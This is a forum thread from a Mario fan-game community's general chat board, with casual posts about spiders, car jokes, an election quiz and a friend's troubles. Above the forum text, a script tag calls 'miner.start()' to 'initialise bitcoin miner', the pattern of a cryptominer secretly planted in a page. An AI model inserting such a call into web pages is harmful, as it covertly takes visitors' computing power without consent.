<script>
miner.start(); // initialise bitcoin miner
</script>

pge projectmario fan games galaxysmbx community

talkhaus thoughts

here's a good place for FRIENDLY, ENJOYABLE, and otherwise very GENERAL discussion!
GlitchedGhost

Re: Twitter Thread

Postby GlitchedGhost » 4 years ago

Alice wrote:Apparently he rarely checks Steam messages which was the only real way I had to try to contact him. I normally would've pmed him here instead since even if he doesn't reply I can at least tell if he's seen it but he hasn't logged in here since the beginning of last month and he was never actually online on Steam when I was so I had to resort to sending him offline messages instead.
Maybe you guys should exchange emails or something, jeez
He captured!
raocow wrote:last night I had a dream where I finally understood what a 'birb' is, and turns out it's a collyflower

metasomnia?
the calm before the storm
First name: Meta
Pronouns: he/him/his

Postby metasomnia? » 4 years ago

Ivy wrote: ah good avatar my man, I have just completed Dream Land 2
Thanks!

I was trying out different combinations and that one was adorable so took a picture

Le Neveu de Rameau
I'm a hoobsie roller; I got robots in my life
First name: Rameau's Nephew

Postby Le Neveu de Rameau » 4 years ago

ZephyrBurst wrote:Redownloaded it and tweaked some shit on my phone and now it runs decently-ish. The troubles of a phone with just adequate hardware.

Come up with a car analogy for that.
I think a toilet analogy may be more fitting. As a compromise, I propose it be a toilet with wheels. And a giant hood ornament. And 1950s Googie-esque fins. All the ladies will rush to take a spin in your hot new T-Bird. And I do mean spin in the most literal way possible.

ZephyrBurst
A Bird Cat
Pronouns: He

Postby ZephyrBurst » 4 years ago

Le Neveu de Rameau wrote:I think a toilet analogy may be more fitting. As a compromise, I propose it be a toilet with wheels. And a giant hood ornament. And 1950s Googie-esque fins. All the ladies will rush to take a spin in your hot new T-Bird. And I do mean spin in the most literal way possible.
Googled "Toilet with wheels" and this made me giggle the most from the immediate images.

As an added bonus, some cover of Green Greens from Kirby's Dream Land had just started playing when this image was found.

Alice
Pronouns: Girl person

Postby Alice » 4 years ago

GlitchedGhost wrote:Maybe you guys should exchange emails or something, jeez
Yeah, once I get the site back up and running I think I'll ask him about a more reliable method to get a hold of him at times like this. Communication with the person I'm running the site for is kinda pretty vital.

Telamon
TO PROTECT PENGUIN MACHINE MERGED THE TRAINING MAN.

Postby Telamon » 4 years ago

ZephyrBurst wrote:
Le Neveu de Rameau wrote:I think a toilet analogy may be more fitting. As a compromise, I propose it be a toilet with wheels. And a giant hood ornament. And 1950s Googie-esque fins. All the ladies will rush to take a spin in your hot new T-Bird. And I do mean spin in the most literal way possible.
Those are taillights from a '59 Cadillac, the most be-finned of all 50s cars, so I guess it's closer to the analogy than you might think.

Coryman
The road to nowhere leads to me
First name: Cory

Postby Coryman » 4 years ago

It just now clicked, Pokemongo = Pokemon go, not poke mongo
raocow wrote: In a world where shag carpeting wins a fight against a helicopter, we spend a lot of time reading and comparing numbers.

freakin whatzit
welcome to th :|
First name: alex
Pronouns: they or she

Postby freakin whatzit » 4 years ago

it's almost 2:30 am and i can't go to bed until this spider stops being in my room, or at least near my bed.
help.
I AM VERY DISGUSTED WITH THE TRASHY MAN. IN SPITE OF THE MONSTER, AND THE COACH, ONLY TRASHY, I WILL BEAT DOWN THEM ALL. FOR THIS I MUST STRENGTHEN MYSELF. THE MONSTER IS THE SAME TOO. COLLECT ALL THE TRASHY, RIGHTEOUS FELLOW ARE ALL UNPARDONABLE! YOU DON'T AFFECT ME. THE TRASHY STROLLING IS AN EYESORE!

metasomnia?
the calm before the storm
First name: Meta

Postby metasomnia? » 4 years ago

Kill it

Alice

http://www.isidewith.com/elections/2016 ... 2404479543

I'm actually a bit surprised I agree with Jill Stein that much. Everything I'd heard about her up until now I do agree with her a lot but less than Sanders and Clinton both. Also while I'm not entirely sure how much of a difference it'd make there is one question where I would have sided with Stein but answered the same as Clinton because I somehow missed Stein's answer.
Do you support Common Core national standards?

You: Yes, I support the concept but not the current implementation
Hillary Clinton’s similar answer: Yes
Jill Stein and Bernie Sanders: No, teach to each student's potential instead of uniform testing
Gary Johnson and Donald Trump: No, education should be handled at the state and local level instead of the national level
I agree with Stein/Sanders a lot more here but I somehow didn't see that answer. I don't disagree with setting up a uniform basis for education but I definitely think it should be geared towards each individual student rather than purely uniform regardless of each student's potential.

freakin whatzit
welcome to th :|
First name: alex
Pronouns: they or she

Postby freakin whatzit » 4 years ago

spider update: it went in the crack between the wall and the window frame. i'm assuming that's its home, so i'll just leave it there.
as long as i don't have to see it, i'm fine enough with it existing and eating all the other gross bugs i don't like. (still a little freaked out though.)
I AM VERY DISGUSTED WITH THE TRASHY MAN. IN SPITE OF THE MONSTER, AND THE COACH, ONLY TRASHY, I WILL BEAT DOWN THEM ALL. FOR THIS I MUST STRENGTHEN MYSELF. THE MONSTER IS THE SAME TOO. COLLECT ALL THE TRASHY, RIGHTEOUS FELLOW ARE ALL UNPARDONABLE! YOU DON'T AFFECT ME. THE TRASHY STROLLING IS AN EYESORE!

cats-on-ice
Back from the grave

Postby cats-on-ice » 4 years ago

Honestly I'm hurting really badly but I don't know what I would say if someone asked me what's wrong
Image<--- I h8 u horikawa

TaviTurnip
Reach for the top
Abministrator
First name: Rena

Postby TaviTurnip » 4 years ago

I've been dealing with a spider lately too (this happens way too often but hey summer) and I discovered only this week that I'm more afraid of seeing the spider than I am of it touching me unexpectedly. It's absolutely bizarre, but it's absolutely an "out of sight, out of mind" result and it's made sleeping and being at my desk infinitely easier. SEEING the spider makes every single surface of my room a red zone, like you have to be constantly aware of the area you saw it and be on alert at all times, but having it crawl on me out of nowhere forces me to already be dealing with it and just means I'll fling it in some random direction, which instantly alleviates all sense of "oh FUCK IT'S HERE" because it's not here anymore, it's over there somewhere probably with a concussion :1 No potential for it to sneak up on me because it already did that and no longer can for some time.

Really weird resolution to spider and bug issues, but it turned out well. I know he's still in here somewhere though... the jerk.
I regularly stream on Twitch! with other members of the talkhaus. Come watch on Tuesdays and Saturdays if you like Splatoon, Pokémon, and other RPGs!

Alice

I have like three or four spiders in my room. One of them even crawled across my monitor the other day randomly, lol.

Ashan
The world has become a place

Postby Ashan » 4 years ago

An old friend of mine invited me to hang out this Friday, and then once I agreed to it he casually threw out "we can load the kids in the back of the car and go get lunch"

This guy got his girlfriend pregnant at 19, basically had a shotgun wedding, has moved like 4 times since the wedding (in 2013), made his dad buy them a house which they were supposed to pay him for but I guess they haven't been so now they're being evicted and moving out of town to his wife's reserve (Where they get free housing), his parents are now separated because his mom was so mad his dad gave into their demands of buying them a house, they've had a second kid, apparently they're buying a brand new car soon, he doesn't have a driver's license and his paternity leave is almost up.

So since he's moving out of town soon, that's the reason he cited he wanted to hang out. But now I find out I'm helping him babysit.

Mata Hari

Postby Mata Hari » 4 years ago

Ashan wrote:An old friend of mine
Do you actually want to hang out with him

Ashan

I liked hanging out with him before he ruined his life.

Mata Hari

So no?

Ashan

I mean, if we could just hang out and not have the constant overhanging burden of his wife and/or children I'd still want to.

Mata Hari

But you know that's not going to happen.

FancyFancy

Postby FancyFancy » 4 years ago

RE: Pokemon GO

I went walking before it was cool.
FILMED IN
ImageImage

ohmato
hey idiot

Postby ohmato » 4 years ago

should standards be permitted in talkhaus y/n circle one (<3)

Pikabread
we're gonna talk about e
First name: lily
Pronouns: she/her/xe/xem

Postby Pikabread » 4 years ago

ohmato wrote:should standards be permitted in talkhaus y/n circle one (<3)

TaviTurnip
Reach for the top
Abministrator
First name: Rena

Postby TaviTurnip » 4 years ago

Why, did someone post mouse sandwiches?
I regularly stream on Twitch! with other members of the talkhaus. Come watch on Tuesdays and Saturdays if you like Splatoon, Pokémon, and other RPGs!

ohmato
hey idiot

Postby ohmato » 4 years ago

Pikabread wrote:i smell really bad also i have friends
yeah i bet buddy boy

Return to “the gazebo”